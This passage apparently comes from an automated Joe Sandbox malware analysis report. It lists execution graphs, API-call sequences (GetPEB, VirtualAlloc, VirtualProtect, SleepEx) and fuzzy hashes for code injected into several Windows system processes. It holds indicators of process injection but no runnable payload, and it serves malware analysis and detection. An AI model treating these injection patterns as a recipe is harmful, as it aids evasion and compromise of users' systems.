              • Snapshot File: hcaresult_5_2_d00000_sihost.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: b51a704314288d1b0f1b7bf0bbd3c43db8584f69feebe1071ffab75a69e2b621
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 02F03AB6514504BFFB017BB09C89A7F3A9CEE40301B840535BC4EDA4DADD349C148975

              Execution Graph

              Execution Coverage:3.9%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:59
              Total number of Limit Nodes:2
              execution_graph 2327 f008e2 2328 f008e8 2327->2328 2330 f00908 2328->2330 2336 f00d05 2330->2336 2332 f0097a 2339 f0097f 2332->2339 2334 f00914 2334->2332 2335 f00960 SleepEx RtlExitUserThread 2334->2335 2335->2332 2344 f00c80 GetPEB 2336->2344 2338 f00d0a 2338->2334 2340 f00d05 GetPEB 2339->2340 2341 f0098b 2340->2341 2343 f00a13 2341->2343 2346 f00a1a 2341->2346 2343->2332 2345 f00c8c 2344->2345 2345->2338 2345->2345 2349 f00a1f 2346->2349 2348 f00b32 2348->2343 2349->2348 2350 f00b34 2349->2350 2352 f00b42 2350->2352 2353 f00d05 GetPEB 2352->2353 2354 f00b4e 2353->2354 2363 f00b68 2354->2363 2356 f00b61 2371 f00ba6 2356->2371 2361 f00b98 2377 f008e2 2361->2377 2364 f00b6d 2363->2364 2365 f00ba6 3 API calls 2364->2365 2369 f00b98 2365->2369 2366 f008e2 3 API calls 2367 f00bf2 2366->2367 2368 f00c80 GetPEB 2367->2368 2370 f00bf7 2368->2370 2369->2366 2370->2356 2375 f00bab 2371->2375 2372 f008e2 3 API calls 2373 f00bf2 2372->2373 2374 f00c80 GetPEB 2373->2374 2376 f00bf7 2374->2376 2375->2372 2376->2361 2378 f008e8 2377->2378 2379 f00908 3 API calls 2378->2379 2379->2378 2384 f03f94 2385 f03f99 2384->2385 2387 f03fa3 2385->2387 2388 f03fde 2385->2388 2389 f03fe3 2388->2389 2392 f03ffc 2389->2392 2398 f0404d 2389->2398 2391 f0401b 2393 f0404d GetPEB 2391->2393 2392->2387 2394 f0402b 2393->2394 2395 f0404d GetPEB 2394->2395 2396 f0403b 2395->2396 2396->2392 2397 f0404d GetPEB 2396->2397 2397->2392 2399 f04063 GetPEB 2398->2399 2400 f04072 2398->2400 2399->2400 2400->2391 2380 f009a8 2381 f009c8 2380->2381 2382 f00a13 2381->2382 2383 f00a1a 3 API calls 2381->2383 2383->2382

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.3338632608.0000000000F00000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_f00000_svchost.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: 32dd2379993f4d7dbdbd3460659afc81d6333259d3364958f7270641f1aa1eeb
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 17F082B2514504AFFB017BB09C89D7F769CEF40311B840535FC4ADA0DADD389C14A975

              Execution Graph

              Execution Coverage:3.6%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:63
              Total number of Limit Nodes:3
              execution_graph 2528 1909a8 2529 1909c8 2528->2529 2530 190b32 2529->2530 2531 190a1a 3 API calls 2529->2531 2533 190a13 2531->2533 2532 190b34 3 API calls 2532->2530 2533->2530 2533->2532 2456 1908e2 2457 1908e8 2456->2457 2459 190908 2457->2459 2465 190d05 2459->2465 2461 19097a 2468 19097f 2461->2468 2463 190914 2463->2461 2464 190960 SleepEx RtlExitUserThread 2463->2464 2464->2461 2475 190c80 GetPEB 2465->2475 2467 190d0a 2467->2463 2469 190d05 GetPEB 2468->2469 2471 19098b 2469->2471 2470 190b32 2470->2461 2471->2470 2477 190a1a 2471->2477 2473 190a13 2473->2470 2481 190b34 2473->2481 2476 190c8c 2475->2476 2476->2467 2476->2476 2480 190a1f 2477->2480 2478 190b34 3 API calls 2479 190b32 2478->2479 2479->2473 2480->2478 2480->2479 2483 190b42 2481->2483 2484 190d05 GetPEB 2483->2484 2485 190b4e 2484->2485 2494 190b68 2485->2494 2487 190b61 2502 190ba6 2487->2502 2492 190b98 2508 1908e2 2492->2508 2495 190b6d 2494->2495 2496 190ba6 3 API calls 2495->2496 2500 190b98 2496->2500 2497 1908e2 3 API calls 2498 190bf2 2497->2498 2499 190c80 GetPEB 2498->2499 2501 190bf7 2499->2501 2500->2497 2501->2487 2503 190bab 2502->2503 2504 1908e2 3 API calls 2503->2504 2505 190bf2 2504->2505 2506 190c80 GetPEB 2505->2506 2507 190bf7 2506->2507 2507->2492 2509 1908e8 2508->2509 2510 190908 3 API calls 2509->2510 2510->2509 2511 193f94 2512 193f99 2511->2512 2514 193fa3 2512->2514 2515 193fde 2512->2515 2516 193fe3 2515->2516 2519 193ffc 2516->2519 2525 19404d 2516->2525 2518 19401b 2520 19404d GetPEB 2518->2520 2519->2514 2521 19402b 2520->2521 2522 19404d GetPEB 2521->2522 2523 19403b 2522->2523 2523->2519 2524 19404d GetPEB 2523->2524 2524->2519 2526 194063 GetPEB 2525->2526 2527 194072 2525->2527 2526->2527 2527->2518

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000007.00000002.3338779768.0000000000190000.00000040.00000001.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_7_2_190000_svchost.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: 25c5932651a0dac57c4aac90e5e38a2da7e0603123c5d8d5a8e2391e0421f779
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 45F05EB2514504BFFF02BBB08C8987B369CEF643157450535FC4ADA09ADE348C548575

              Execution Graph

              Execution Coverage:6.8%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:79
              Total number of Limit Nodes:3
              execution_graph 2428 9e09a8 2429 9e09c8 2428->2429 2430 9e0a13 2429->2430 2431 9e0a1a 6 API calls 2429->2431 2431->2430 2411 9e3f94 2412 9e3f99 2411->2412 2413 9e3fa3 2412->2413 2415 9e3fde 2412->2415 2416 9e3fe3 2415->2416 2419 9e3ffc 2416->2419 2425 9e404d 2416->2425 2418 9e401b 2420 9e404d GetPEB 2418->2420 2419->2413 2421 9e402b 2420->2421 2422 9e404d GetPEB 2421->2422 2423 9e403b 2422->2423 2423->2419 2424 9e404d GetPEB 2423->2424 2424->2419 2426 9e4063 GetPEB 2425->2426 2427 9e4072 2425->2427 2426->2427 2427->2418 2335 9e08e2 2336 9e08e8 2335->2336 2337 9e08f6 2335->2337 2347 9e1eac 2336->2347 2340 9e0908 2337->2340 2357 9e0d05 2340->2357 2342 9e0914 2343 9e097a 2342->2343 2345 9e1eac 3 API calls 2342->2345 2360 9e097f 2343->2360 2346 9e0960 SleepEx RtlExitUserThread 2345->2346 2346->2343 2348 9e1ebd 2347->2348 2403 9e1da4 2348->2403 2351 9e1da4 3 API calls 2352 9e1f03 2351->2352 2353 9e1da4 3 API calls 2352->2353 2354 9e1f16 2353->2354 2355 9e1da4 3 API calls 2354->2355 2356 9e1f29 2355->2356 2356->2337 2365 9e0c80 GetPEB 2357->2365 2359 9e0d0a 2359->2342 2361 9e0d05 GetPEB 2360->2361 2363 9e098b 2361->2363 2362 9e0a13 2362->2343 2363->2362 2367 9e0a1a 2363->2367 2366 9e0c8c 2365->2366 2366->2359 2366->2366 2370 9e0a1f 2367->2370 2369 9e0b32 2369->2362 2370->2369 2371 9e0b34 2370->2371 2373 9e0b42 2371->2373 2374 9e0d05 GetPEB 2373->2374 2375 9e0b4e 2374->2375 2384 9e0b68 2375->2384 2377 9e0b61 2392 9e0ba6 2377->2392 2382 9e0b98 2398 9e08e2 2382->2398 2385 9e0b6d 2384->2385 2386 9e0ba6 6 API calls 2385->2386 2390 9e0b98 2386->2390 2387 9e08e2 6 API calls 2388 9e0bf2 2387->2388 2389 9e0c80 GetPEB 2388->2389 2391 9e0bf7 2389->2391 2390->2387 2391->2377 2391->2391 2393 9e0bab 2392->2393 2394 9e08e2 6 API calls 2393->2394 2395 9e0bf2 2394->2395 2396 9e0c80 GetPEB 2395->2396 2397 9e0bf7 2396->2397 2397->2382 2397->2397 2399 9e08e8 2398->2399 2400 9e08f6 2398->2400 2402 9e1eac 3 API calls 2399->2402 2401 9e0908 6 API calls 2400->2401 2401->2400 2402->2400 2404 9e1eaa 2403->2404 2405 9e1db8 2403->2405 2404->2351 2405->2404 2406 9e1dca VirtualProtect 2405->2406 2406->2404 2407 9e1df6 2406->2407 2408 9e1df9 VirtualAlloc 2407->2408 2408->2408 2409 9e1e2b 2408->2409 2410 9e1e53 VirtualProtect 2409->2410 2410->2404

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000008.00000002.3337354184.00000000009E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_9e0000_ctfmon.jbxd
              Similarity
              • API ID: Virtual$Protect$Alloc
              • String ID:
              • API String ID: 2541858876-0
              • Opcode ID: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
              • Instruction ID: 44ff9588ec6bfd507583edcc13ee5f1081a6d0af34ed7737366f38eee3e892cb
              • Opcode Fuzzy Hash: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
              • Instruction Fuzzy Hash: 09212D30A34C1D0BEB58627D9859764F6D6E79C720F9803A9E90ED36D8ED68CC8187C5

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000008.00000002.3337354184.00000000009E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_8_2_9e0000_ctfmon.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: e850eb3260708d28ad91721ec924aa1a30e2dc2ae1e3c3e827f944467aa568a1
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 78F05EB2514684AFFB027FB18C8AA7B369CEEC03017440935FC46DA09ADD748C948675

              Execution Graph

              Execution Coverage:3.9%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:59
              Total number of Limit Nodes:2
              execution_graph 2391 843f94 2392 843f99 2391->2392 2393 843fa3 2392->2393 2395 843fde 2392->2395 2396 843fe3 2395->2396 2397 843ffc 2396->2397 2405 84404d 2396->2405 2397->2393 2399 84401b 2400 84404d GetPEB 2399->2400 2401 84402b 2400->2401 2402 84404d GetPEB 2401->2402 2403 84403b 2402->2403 2403->2397 2404 84404d GetPEB 2403->2404 2404->2397 2406 844063 GetPEB 2405->2406 2407 844072 2405->2407 2406->2407 2407->2399 2338 8408e2 2339 8408e8 2338->2339 2341 840908 2339->2341 2347 840d05 2341->2347 2343 840914 2344 84097a 2343->2344 2346 840960 SleepEx RtlExitUserThread 2343->2346 2350 84097f 2344->2350 2346->2344 2355 840c80 GetPEB 2347->2355 2349 840d0a 2349->2343 2351 840d05 GetPEB 2350->2351 2352 84098b 2351->2352 2353 840a13 2352->2353 2357 840a1a 2352->2357 2353->2344 2356 840c8c 2355->2356 2356->2349 2356->2356 2358 840a1f 2357->2358 2360 840b32 2358->2360 2361 840b34 2358->2361 2360->2353 2363 840b42 2361->2363 2364 840d05 GetPEB 2363->2364 2365 840b4e 2364->2365 2374 840b68 2365->2374 2367 840b61 2382 840ba6 2367->2382 2369 840b98 2388 8408e2 2369->2388 2375 840b6d 2374->2375 2376 840ba6 3 API calls 2375->2376 2377 840b98 2376->2377 2378 8408e2 3 API calls 2377->2378 2379 840bf2 2378->2379 2380 840c80 GetPEB 2379->2380 2381 840bf7 2380->2381 2381->2367 2386 840bab 2382->2386 2383 8408e2 3 API calls 2384 840bf2 2383->2384 2385 840c80 GetPEB 2384->2385 2387 840bf7 2385->2387 2386->2383 2387->2369 2389 8408e8 2388->2389 2390 840908 3 API calls 2389->2390 2390->2389 2408 8409a8 2409 8409c8 2408->2409 2410 840a13 2409->2410 2411 840a1a 3 API calls 2409->2411 2411->2410

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000009.00000002.3337345086.0000000000840000.00000040.00000001.00020000.00000000.sdmp, Offset: 00840000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_840000_svchost.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: 69245d1bdd8f7653f51bb1844b39e882d43f934672df0e9b5c731ff2a13993f7
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 52F05EB6914608AFFF007BB89C8997B3A9CFE403017440535FD46DA09AED348C548976

              Execution Graph

              Execution Coverage:3.9%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:59
              Total number of Limit Nodes:2
              execution_graph 2380 ee09a8 2381 ee09c8 2380->2381 2382 ee0a1a 3 API calls 2381->2382 2383 ee0a13 2381->2383 2382->2383 2384 ee3f94 2385 ee3f99 2384->2385 2387 ee3fa3 2385->2387 2388 ee3fde 2385->2388 2389 ee3fe3 2388->2389 2392 ee3ffc 2389->2392 2398 ee404d 2389->2398 2391 ee401b 2393 ee404d GetPEB 2391->2393 2392->2387 2394 ee402b 2393->2394 2395 ee404d GetPEB 2394->2395 2396 ee403b 2395->2396 2396->2392 2397 ee404d GetPEB 2396->2397 2397->2392 2399 ee4063 GetPEB 2398->2399 2400 ee4072 2398->2400 2399->2400 2400->2391 2327 ee08e2 2329 ee08e8 2327->2329 2330 ee0908 2329->2330 2336 ee0d05 2330->2336 2332 ee097a 2339 ee097f 2332->2339 2334 ee0914 2334->2332 2335 ee0960 SleepEx RtlExitUserThread 2334->2335 2335->2332 2344 ee0c80 GetPEB 2336->2344 2338 ee0d0a 2338->2334 2340 ee0d05 GetPEB 2339->2340 2342 ee098b 2340->2342 2341 ee0a13 2341->2332 2342->2341 2346 ee0a1a 2342->2346 2345 ee0c8c 2344->2345 2345->2338 2345->2345 2349 ee0a1f 2346->2349 2348 ee0b32 2348->2341 2349->2348 2350 ee0b34 2349->2350 2352 ee0b42 2350->2352 2353 ee0d05 GetPEB 2352->2353 2354 ee0b4e 2353->2354 2363 ee0b68 2354->2363 2356 ee0b61 2371 ee0ba6 2356->2371 2358 ee0b98 2377 ee08e2 2358->2377 2364 ee0b6d 2363->2364 2365 ee0ba6 3 API calls 2364->2365 2369 ee0b98 2365->2369 2366 ee08e2 3 API calls 2367 ee0bf2 2366->2367 2368 ee0c80 GetPEB 2367->2368 2370 ee0bf7 2368->2370 2369->2366 2370->2356 2372 ee0bab 2371->2372 2373 ee08e2 3 API calls 2372->2373 2374 ee0bf2 2373->2374 2375 ee0c80 GetPEB 2374->2375 2376 ee0bf7 2375->2376 2376->2358 2379 ee08e8 2377->2379 2378 ee0908 3 API calls 2378->2379 2379->2378

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 0000000A.00000002.3339301421.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_ee0000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: 508759bea98720db023dd0e0fc758f425541f33595a2d57816ce7396e964a645
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 20F05EB2514588AFFB017FB18C8A87B36DCEE803017441976FC46EA09ADD758C948675

              Execution Graph

              Execution Coverage:3.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:59
              Total number of Limit Nodes:2
              execution_graph 2482 a43f94 2483 a43f99 2482->2483 2485 a43fa3 2483->2485 2486 a43fde 2483->2486 2487 a43fe3 2486->2487 2490 a43ffc 2487->2490 2496 a4404d 2487->2496 2489 a4401b 2491 a4404d GetPEB 2489->2491 2490->2485 2492 a4402b 2491->2492 2493 a4404d GetPEB 2492->2493 2494 a4403b 2493->2494 2494->2490 2495 a4404d GetPEB 2494->2495 2495->2490 2497 a44063 GetPEB 2496->2497 2498 a44072 2496->2498 2497->2498 2498->2489 2425 a408e2 2426 a408e8 2425->2426 2428 a40908 2426->2428 2434 a40d05 2428->2434 2430 a4097a 2437 a4097f 2430->2437 2431 a40914 2431->2430 2433 a40960 SleepEx RtlExitUserThread 2431->2433 2433->2430 2442 a40c80 GetPEB 2434->2442 2436 a40d0a 2436->2431 2438 a40d05 GetPEB 2437->2438 2440 a4098b 2438->2440 2439 a40a13 2439->2430 2440->2439 2444 a40a1a 2440->2444 2443 a40c8c 2442->2443 2443->2436 2443->2443 2447 a40a1f 2444->2447 2446 a40b32 2446->2439 2447->2446 2448 a40b34 2447->2448 2450 a40b42 2448->2450 2451 a40d05 GetPEB 2450->2451 2452 a40b4e 2451->2452 2461 a40b68 2452->2461 2454 a40b61 2469 a40ba6 2454->2469 2459 a40b98 2475 a408e2 2459->2475 2462 a40b6d 2461->2462 2463 a40ba6 3 API calls 2462->2463 2467 a40b98 2463->2467 2464 a408e2 3 API calls 2465 a40bf2 2464->2465 2466 a40c80 GetPEB 2465->2466 2468 a40bf7 2466->2468 2467->2464 2468->2454 2473 a40bab 2469->2473 2470 a408e2 3 API calls 2471 a40bf2 2470->2471 2472 a40c80 GetPEB 2471->2472 2474 a40bf7 2472->2474 2473->2470 2474->2459 2476 a408e8 2475->2476 2477 a40908 3 API calls 2476->2477 2477->2476 2478 a409a8 2479 a409c8 2478->2479 2480 a40a13 2479->2480 2481 a40a1a 3 API calls 2479->2481 2481->2480

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 0000000B.00000002.3337604081.0000000000A40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_a40000_RuntimeBroker.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: 8c2e81e94c14ba8e344e11a3a8701249c86f4e0d74b3beeb93e978d1080a7375
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: A0F05EBA914504AFFB007BB09D8AC7B369CEE803017440535FD46DA09ADE348C548975

              Execution Graph

              Execution Coverage:3.8%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:63
              Total number of Limit Nodes:3
              execution_graph 2430 5f09a8 2432 5f09c8 2430->2432 2431 5f0b32 2432->2431 2433 5f0a1a 3 API calls 2432->2433 2435 5f0a13 2433->2435 2434 5f0b34 3 API calls 2434->2431 2435->2431 2435->2434 2413 5f3f94 2414 5f3f99 2413->2414 2416 5f3fa3 2414->2416 2417 5f3fde 2414->2417 2418 5f3fe3 2417->2418 2421 5f3ffc 2418->2421 2427 5f404d 2418->2427 2420 5f401b 2422 5f404d GetPEB 2420->2422 2421->2416 2423 5f402b 2422->2423 2424 5f404d GetPEB 2423->2424 2425 5f403b 2424->2425 2425->2421 2426 5f404d GetPEB 2425->2426 2426->2421 2428 5f4063 GetPEB 2427->2428 2429 5f4072 2427->2429 2428->2429 2429->2420 2358 5f08e2 2360 5f08e8 2358->2360 2361 5f0908 2360->2361 2367 5f0d05 2361->2367 2363 5f0914 2364 5f097a 2363->2364 2366 5f0960 SleepEx RtlExitUserThread 2363->2366 2370 5f097f 2364->2370 2366->2364 2377 5f0c80 GetPEB 2367->2377 2369 5f0d0a 2369->2363 2371 5f0d05 GetPEB 2370->2371 2373 5f098b 2371->2373 2372 5f0b32 2372->2364 2373->2372 2379 5f0a1a 2373->2379 2376 5f0a13 2376->2372 2383 5f0b34 2376->2383 2378 5f0c8c 2377->2378 2378->2369 2378->2378 2382 5f0a1f 2379->2382 2380 5f0b34 3 API calls 2381 5f0b32 2380->2381 2381->2376 2382->2380 2382->2381 2385 5f0b42 2383->2385 2386 5f0d05 GetPEB 2385->2386 2387 5f0b4e 2386->2387 2396 5f0b68 2387->2396 2389 5f0b61 2404 5f0ba6 2389->2404 2394 5f0b98 2410 5f08e2 2394->2410 2397 5f0b6d 2396->2397 2398 5f0ba6 3 API calls 2397->2398 2402 5f0b98 2398->2402 2399 5f08e2 3 API calls 2400 5f0bf2 2399->2400 2401 5f0c80 GetPEB 2400->2401 2403 5f0bf7 2401->2403 2402->2399 2403->2389 2405 5f0bab 2404->2405 2406 5f08e2 3 API calls 2405->2406 2407 5f0bf2 2406->2407 2408 5f0c80 GetPEB 2407->2408 2409 5f0bf7 2408->2409 2409->2394 2412 5f08e8 2410->2412 2411 5f0908 3 API calls 2411->2412 2412->2411

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.3337862709.00000000005F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_5f0000_dllhost.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: 2490ec10bc82a4dcd380210c0a096dc508ed29f265749e4b3b2212abb351009a
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: D0F03AB251490DAFFB007BB08C8D87B7A9CFE803017481925BE46DA09BED389C148A79

              Execution Graph

              Execution Coverage:3.6%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:63
              Total number of Limit Nodes:3
              execution_graph 2456 5308e2 2457 5308e8 2456->2457 2459 530908 2457->2459 2465 530d05 2459->2465 2461 53097a 2468 53097f 2461->2468 2463 530914 2463->2461 2464 530960 SleepEx RtlExitUserThread 2463->2464 2464->2461 2475 530c80 GetPEB 2465->2475 2467 530d0a 2467->2463 2469 530d05 GetPEB 2468->2469 2471 53098b 2469->2471 2470 530b32 2470->2461 2471->2470 2477 530a1a 2471->2477 2474 530a13 2474->2470 2481 530b34 2474->2481 2476 530c8c 2475->2476 2476->2467 2476->2476 2478 530a1f 2477->2478 2479 530b34 3 API calls 2478->2479 2480 530b32 2478->2480 2479->2480 2480->2474 2483 530b42 2481->2483 2484 530d05 GetPEB 2483->2484 2485 530b4e 2484->2485 2494 530b68 2485->2494 2487 530b61 2502 530ba6 2487->2502 2492 530b98 2508 5308e2 2492->2508 2495 530b6d 2494->2495 2496 530ba6 3 API calls 2495->2496 2500 530b98 2496->2500 2497 5308e2 3 API calls 2498 530bf2 2497->2498 2499 530c80 GetPEB 2498->2499 2501 530bf7 2499->2501 2500->2497 2501->2487 2506 530bab 2502->2506 2503 5308e2 3 API calls 2504 530bf2 2503->2504 2505 530c80 GetPEB 2504->2505 2507 530bf7 2505->2507 2506->2503 2507->2492 2509 5308e8 2508->2509 2510 530908 3 API calls 2509->2510 2510->2509 2511 533f94 2512 533f99 2511->2512 2514 533fa3 2512->2514 2515 533fde 2512->2515 2516 533fe3 2515->2516 2519 533ffc 2516->2519 2525 53404d 2516->2525 2518 53401b 2520 53404d GetPEB 2518->2520 2519->2514 2521 53402b 2520->2521 2522 53404d GetPEB 2521->2522 2523 53403b 2522->2523 2523->2519 2524 53404d GetPEB 2523->2524 2524->2519 2526 534063 GetPEB 2525->2526 2527 534072 2525->2527 2526->2527 2527->2518 2528 5309a8 2529 5309c8 2528->2529 2530 530b32 2529->2530 2531 530a1a 3 API calls 2529->2531 2533 530a13 2531->2533 2532 530b34 3 API calls 2532->2530 2533->2530 2533->2532

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000010.00000002.3338936365.0000000000530000.00000040.00000001.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_16_2_530000_RuntimeBroker.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: 62b1bcab464dd3cfca7a072dbdfa0fab3f0c9a3dd9cdaf5e3ceb70a3c9b18f5a
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 8BF05EB2514A09AFFB007BB08C9D97B3B9CFE80301B441935FC46DA0DADD358C148A79

              Execution Graph

              Execution Coverage:3.9%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:59
              Total number of Limit Nodes:2
              execution_graph 2338 8208e2 2339 8208e8 2338->2339 2341 820908 2339->2341 2347 820d05 2341->2347 2343 82097a 2350 82097f 2343->2350 2345 820914 2345->2343 2346 820960 SleepEx RtlExitUserThread 2345->2346 2346->2343 2355 820c80 GetPEB 2347->2355 2349 820d0a 2349->2345 2351 820d05 GetPEB 2350->2351 2352 82098b 2351->2352 2353 820a13 2352->2353 2357 820a1a 2352->2357 2353->2343 2356 820c8c 2355->2356 2356->2349 2356->2356 2360 820a1f 2357->2360 2359 820b32 2359->2353 2360->2359 2361 820b34 2360->2361 2363 820b42 2361->2363 2364 820d05 GetPEB 2363->2364 2365 820b4e 2364->2365 2374 820b68 2365->2374 2367 820b61 2382 820ba6 2367->2382 2372 820b98 2388 8208e2 2372->2388 2375 820b6d 2374->2375 2376 820ba6 3 API calls 2375->2376 2380 820b98 2376->2380 2377 8208e2 3 API calls 2378 820bf2 2377->2378 2379 820c80 GetPEB 2378->2379 2381 820bf7 2379->2381 2380->2377 2381->2367 2386 820bab 2382->2386 2383 8208e2 3 API calls 2384 820bf2 2383->2384 2385 820c80 GetPEB 2384->2385 2387 820bf7 2385->2387 2386->2383 2387->2372 2389 8208e8 2388->2389 2390 820908 3 API calls 2389->2390 2390->2389 2391 823f94 2392 823f99 2391->2392 2394 823fa3 2392->2394 2395 823fde 2392->2395 2396 823fe3 2395->2396 2399 823ffc 2396->2399 2405 82404d 2396->2405 2398 82401b 2400 82404d GetPEB 2398->2400 2399->2394 2401 82402b 2400->2401 2402 82404d GetPEB 2401->2402 2403 82403b 2402->2403 2403->2399 2404 82404d GetPEB 2403->2404 2404->2399 2406 824063 GetPEB 2405->2406 2407 824072 2405->2407 2406->2407 2407->2398 2408 8209a8 2409 8209c8 2408->2409 2410 820a13 2409->2410 2411 820a1a 3 API calls 2409->2411 2411->2410

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.3339661175.0000000000820000.00000040.00000001.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_820000_RuntimeBroker.jbxd
              Similarity
              • API ID: ExitSleepThreadUser
              • String ID:
              • API String ID: 3375650085-0
              • Opcode ID: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction ID: f15670f4127766d05280988ba789b204f416b2049cda367683d08d106eb4f630
              • Opcode Fuzzy Hash: 66c14bb19a12319de0a23b72fa525975436deb3dc92e74ee1b0fcfaae60abcbc
              • Instruction Fuzzy Hash: 2EF05EB6514524BFFF007BB8AC8987B369CFE503017540535FC46DA09BDD348C948976

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000012.00000002.2434430030.0000000000250000.00000040.00000001.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_18_2_250000_smartscreen.jbxd
              Similarity
              • API ID: Virtual$Protect$Alloc
              • String ID:
              • API String ID: 2541858876-0
              • Opcode ID: a707470d843bdecd61bcb7dc3da2ecf189b84d221a330a2132ef3fe4d28180d6
              • Instruction ID: 6e0df8d9f998a8712087ea6067a65867bf4beec65ed23bfde698a22f879cf213
